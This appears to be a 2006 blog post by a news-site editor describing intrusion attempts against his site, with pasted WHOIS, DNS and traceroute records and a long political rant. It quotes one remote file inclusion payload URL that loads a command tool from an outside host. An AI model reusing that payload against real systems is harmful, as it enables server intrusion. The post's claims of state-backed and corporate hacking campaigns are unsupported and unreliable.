|
Like Texas radio, comin' in cool and slow across the swamps with IP addresses from Turkey and Iran. Their hacking "tools" are stashed in Texas and Georgia, and their URLs look like this: http://trendysims2.altervista.org/forum/admin/tool25.dat?cmd=id /modules/My_eGallery/public/displayCategory.php?basepath=http://trendysims2.altervista.org/forum/admin/tool25. Let it be known, that shit like that doesn't work anymore and visitors who fish for non-existant URLs on my websites stand out like phosphorescent flamingos. Someday I'll have to tell you about the fools with IP addresses from Tehran stashed there tool in a cheerleader website - a few minutes down the road from Fort Benning, Georgia, please take the link for a clue about what is happening to independent media sites around the world. It is not too different from the rampant crimes committed against blacks in the 60s when the rednecks knew that the FBI was standing down, insofar as crimes against civil rights activists were concerned. At least they can't murder us with data packets, but they are prepared to unlease billions of them on political targets. Fortunately for us, these malefactors are stupid lamers who barely know how to type. Like the Leesburg Mafia of Halliburton fame, they're alot more effective when they're up close and personal, breaking someone's legs. This new breed of hacker belongs to the world of corporate enforcers hired by corporations like Chiquita Brands and KBR, and their style fits the Republican mold of silencing all voices but theirs. Their history goes back at least has far as the attempt by Jerry Ford to veto the Freedom of Information Act: it became law when congress over-rode his veto. Before him, Richard Nixon became impatient when the CIA couldn't readily come up for bagmen to suit his self-serving political purposes. Cowboy Bush has topped them all - and has tried to make rampant lawlessnes the law of the land, by allowing the "intelligence" agencies to hire criminals off the street for domestic spying operations. In related instances from the era of the Chicago Red Squad, surveillence has always been accompanied by harrassment. In fact, the purpose up setting up domestic surveillance has been to provide an opportunity to harrass political opponents. Surveil and control: that is politics today, as played by a new wave of far-right wingnuts. But like the Gang That Couldn't Shoot Straight, they are just too stupid to pull it off. So here I give you the dossier of yet another pack of LAMERS:this time housed in the friendly confines of Everyone's Internet in Houston Texas, where I find the all too familiar names of Valarie Stinson and Randy Williams listed as technicians
Altervista.org has been around for long enough that these guys ought to know what kind of mayhem they are supporting with the multiple IP addresses and bandwidth they have provided - the latest data follows at the end of this story.
David Roknich
Editor,
DOGSPOT
OrgName: Everyones Internet
OrgID: EVRY
Address: 390 Benmar
Address: Suite 200
City: Houston
StateProv: TX
PostalCode: 77060
Country: US
NetRange: 67.15.0.0 - 67.15.255.255
CIDR: 67.15.0.0/16
NetName: EVRY-BLK-15
NetHandle: NET-67-15-0-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.EV1.NET
NameServer: NS2.EV1.NET
Comment:
RegDate: 2004-02-06
Updated: 2005-12-16
RTechHandle: RW172-ARIN
RTechName: Williams, Randy
RTechPhone: +1-713-579-2850
RTechEmail: admin@ev1.net
OrgAbuseHandle: ABUSE477-ARIN
OrgAbuseName: ABUSE
OrgAbusePhone: +1-713-579-2850
OrgAbuseEmail: abuse@ev1.net
OrgNOCHandle: NOC1445-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-713-579-2850
OrgNOCEmail: noc@ev1.net
OrgTechHandle: RW172-ARIN
OrgTechName: Williams, Randy
OrgTechPhone: +1-713-579-2850
OrgTechEmail: admin@ev1.net
OrgTechHandle: VST3-ARIN
OrgTechName: Stinson, Valarie
OrgTechPhone: +1-713-579-2850
OrgTechEmail: admin2@ev1.net
# ARIN WHOIS database, last updated 2006-05-10 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
DNS records| name | class | type | data | time to live | | trendysims2.altervista.org | IN | A | 67.15.38.79 | 86361s | (23:59:21) | | altervista.org | IN | SOA | | server: | ns1.altervista.org | | email: | hostmaster.altervista.org | | serial: | 201437419 | | refresh: | 28800 | | retry: | 7200 | | expire: | 2419200 | | minimum ttl: | 86400 |
| 86400s | (1.00:00:00) | | altervista.org | IN | NS | ns2.altervista.org | 86400s | (1.00:00:00) | | altervista.org | IN | NS | ns3.altervista.org | 86400s | (1.00:00:00) | | altervista.org | IN | NS | ns1.altervista.org | 86400s | (1.00:00:00) | | altervista.org | IN | A | 216.127.94.127 | 86400s | (1.00:00:00) | | altervista.org | IN | MX | | preference: | 0 | | exchange: | mail.redirection.net |
| 86400s | (1.00:00:00) | | 79.38.15.67.in-addr.arpa | IN | PTR | ns11.altervista.org | 7161s | (01:59:21) |
TracerouteTracing route to trendysims2.altervista.org [67.15.38.79]... | hop | rtt | rtt | rtt | ? | ip address | fully qualified domain name |
| 1 | 0 | 0 | 0 | ? | 216.46.228.229 | port-216-3073253-es128.devices.datareturn.com |
| 2 | 0 | 0 | 0 | ? | 64.29.192.145 | port-64-1949841-zzt0prespect.devices.datareturn.com |
| 3 | 0 | 0 | 0 | ? | 64.29.192.226 | daa.g921.ispb.datareturn.com |
| 4 | 0 | 0 | 0 | ? | 168.215.241.133 | hagg-01-ae0-1001.dlfw.twtelecom.net |
| 5 | 0 | 0 | 0 | ? | 66.192.246.217 | core-02-ge-3-1-3-503.dlfw.twtelecom.net |
| 6 | 5 | 5 | 5 | ? | 66.192.246.19 | dist-01-so-1-0-0-0.hsto.twtelecom.net |
| 7 | 77 | 62 | 5 | ? | 66.192.246.123 | hagg-02-ge-0-3-0-505.hsto.twtelecom.net |
| 8 | 7 | 7 | 7 | ? | 216.110.27.98 | 216-110-27-98.static.twtelecom.net |
| 9 | 9 | 9 | 9 | ? | 66.98.241.29 | gphou-66-98-241-29.ev1.net |
Trace aborted and that's not all: here's a typical attack IPAddress lookupDomain Whois recordQueried whois.metu.edu.tr with "ttnet.net.tr"... ** Registrant:
Turk Telekominikasyon A.S.
TT Gen.Mud.Bilisim Aglari Dairesi Turgur Ozal Bul.
06103
Ankara,
Turkiye
ipg@turktelekom.com.tr
+ 90-312-3131937-
+ 90-312-3131924
** Administrative Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Technical Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Billing Contact:
Nick Handle : tta6-metu
Person : Turk Telekomunikasyon A.S. Temsilcisi
Organization Name : Turk Telekomunikasyon A.S.
Address : TT Gen . Mud. Bilisim Aglari Dairesi
Turgut Ozal Bulv. AYDINLIKEVLER
Ankara,06103
Turkiye
Phone : + 90-312-3131922-
Fax : + 90-312-3131924
** Domain Servers:
ns1.ttnet.net.tr 212.156.4.4
ns2.ttnet.net.tr 212.156.4.20
** Additional Info:
Created on..............: 1998-May-08.
Expires on..............: 2007-May-07.
Network Whois recordQueried whois.ripe.net with "-B 85.98.213.195"... % This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Note: the default output of the RIPE Whois server
% is changed. Your tools may need to be adjusted. See
% http://www.ripe.net/db/news/abuse-proposal-20050331.html
% for more details.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Information related to '85.98.144.0 - 85.98.255.255'
inetnum: 85.98.144.0 - 85.98.255.255
netname: TurkTelekom
descr: Turk Telekom ADSL-meteksan_2
country: tr
admin-c: TTBA1-RIPE
tech-c: TTBA1-RIPE
status: ASSIGNED PA
mnt-by: as9121-mnt
notify: ipg@telekom.gov.tr
changed: ipg@telekom.gov.tr 20050620
source: RIPE
role: TT Administrative Contact Role
address: Turk Telekom
address: Bilisim Aglari Dairesi
address: Aydinlikevler
address: 06103 ANKARA
phone: +90 312 313 1950
fax-no: +90 312 313 1949
e-mail: abuse@ttnet.net.tr
admin-c: BADB3-RIPE
tech-c: ZA66-RIPE
tech-c: ZA196-RIPE
tech-c: LA109-RIPE
tech-c: NO638-RIPE
nic-hdl: TTBA1-RIPE
notify: ipg@turktelekom.com.tr
mnt-by: AS9121-MNT
changed: ipg@telekom.gov.tr 20000608
changed: ipg@telekom.gov.tr 20001020
changed: ipg@telekom.gov.tr 20010615
changed: ipg@turktelekom.com.tr 20040903
source: RIPE
% Information related to '85.98.128.0/17AS9121'
route: 85.98.128.0/17
descr: TurkTelecom
origin: AS9121
mnt-by: AS9121-MNT
changed: ipg@turktelekom.com.tr 20041214
source: RIPE
DNS recordsDNS query for dsl85-98-54723.ttnet.net.tr returned an error from the server: NameError | name | class | type | data | time to live | | ttnet.net.tr | IN | TXT | v=spf1 a mx ptr a:212.175.13.129 mx:212.175.14.134 ~all | 10300s | (02:51:40) | | ttnet.net.tr | IN | SOA | | server: | eylul1.ttnet.net.tr | | email: | ipg.telekom.gov.tr | | serial: | 2006050402 | | refresh: | 10800 | | retry: | 7200 | | expire: | 216000 | | minimum ttl: | 10300 |
| 10300s | (02:51:40) | | ttnet.net.tr | IN | NS | ns1.ttnet.net.tr | 10300s | (02:51:40) | | ttnet.net.tr | IN | NS | ns2.ttnet.net.tr | 10300s | (02:51:40) | | ttnet.net.tr | IN | MX | | preference: | 10 | | exchange: | ttfarm.ttnet.net.tr |
| 20800s | (05:46:40) | | ttnet.net.tr | IN | A | 212.175.13.37 | 10300s | (02:51:40) | | 195.213.98.85.in-addr.arpa | IN | PTR | dsl85-98-54723.ttnet.net.tr | 86375s | (23:59:35) |
TracerouteTracing route to dsl85-98-54723.ttnet.net.tr [85.98.213.195]... | hop | rtt | rtt | rtt | ? | ip address | fully qualified domain name |
| 1 | 0 | 0 | 0 | ? | 216.46.228.229 | port-216-3073253-es128.devices.datareturn.com |
| 2 | 0 | 0 | 0 | ? | 64.29.192.145 | port-64-1949841-zzt0prespect.devices.datareturn.com |
| 3 | 0 | 0 | 0 | ? | 64.29.192.226 | daa.g921.ispb.datareturn.com |
| 4 | 0 | 0 | 0 | ? | 168.215.241.133 | hagg-01-ae0-1001.dlfw.twtelecom.net |
| 5 | 0 | 0 | 1 | ? | 66.192.253.124 | core-02-ge-3-1-0-504.dlfw.twtelecom.net |
| 6 | 34 | 34 | 34 | ? | 66.192.255.19 | core-01-so-0-0-0-0.asbn.twtelecom.net |
| 7 | 34 | 34 | 37 | ? | 66.192.255.229 | peer-01-so-0-0-0-0.asbn.twtelecom.net |
| 8 | 56 | 56 | 56 | ? | 206.223.115.19 | equinix-was.ip.tiscali.net |
| 9 | 130 | 146 | 129 | ? | 213.200.82.182 | so-1-0-0.par77.ip.tiscali.net |
| 11 | 185 | 185 | 185 | ? | 212.156.118.249 | gyt_t1_1-gyt-ebgp.ttnet.net.tr |
| 12 | 197 | 198 | 197 | ? | 212.156.120.30 | izm_t1_1-gyt_t1_1.ttnet.net.tr |
| 15 | 219 | 217 | 218 | ? | 85.98.213.195 | dsl85-98-54723.ttnet.net.tr |
Trace complete
| 
homepage:
The hack attempt was well documented enough above for an educated reader.
They addressed a well-known "hackers tool" at another site in an attempt to use it on a non-existant URL on my website.
Essentially, string of commands was entered into the address bar of a web browser
(I can tell you what browser was used, from my logs)
with the intent of aquiring administrative privelages on my server.
I don't take this lightly: the new draconian laws draughted by the junta of our current hacker-and thief in the Whore House on Pennsylvannia avenue consider it to be "computer terrorism.
The string of commands can be read in the original text of my post.
It is common for teeanagers to attempt these things, albeit lame.
But when grown men do it with impunity on the public's time it is intolerable.
Some of them have spent large sums of money aquiring 1000s of IP address so they can use them against websites that spread information that is intentionally buried by their operatives within the news media.
This is a phenomenon that need to be made well known in a nation that aspires to democracy. I have done my best in this regard. I recently had to block
(excuse the pun) 16,000 addresses purchased by a hacker in Santa Clara that were being sequentially deployed against my website.
Ask Michael Rupert and others how difficult it is to promulgate the news these days, and how much they have to spend of computer security.
I might also add that various sorts of physical attacks have precisely coincided with "visits to my website by IP addresses I don't like".
And by the way, "I don't like you" might have special meaning to a naive "cyber warrior" in the service of the empire because that is one of the responses you will get if you try to enter illegal commands into the interactive software used at my news sites.
Some of these lamers are employed by the State of California - they are the same people being sued for stalking the Raging Grannies and others are on the police force of allegedly liberal Soquel, California where they are assisted by the self-styled anti-terrorist Mr. Jeffries at the local shopping mall where he and the local cops getb their jollies by filmimg attractive female protesters from the roof of the mall ON THE TAXPAYER's DIME.
Is the air a little clearer now? Turn on the fan if I haven't blown out all of your DISINFORMATION.
sieg heil and have a nice republican day!
David Roknich,
Editor,
DOGSPOT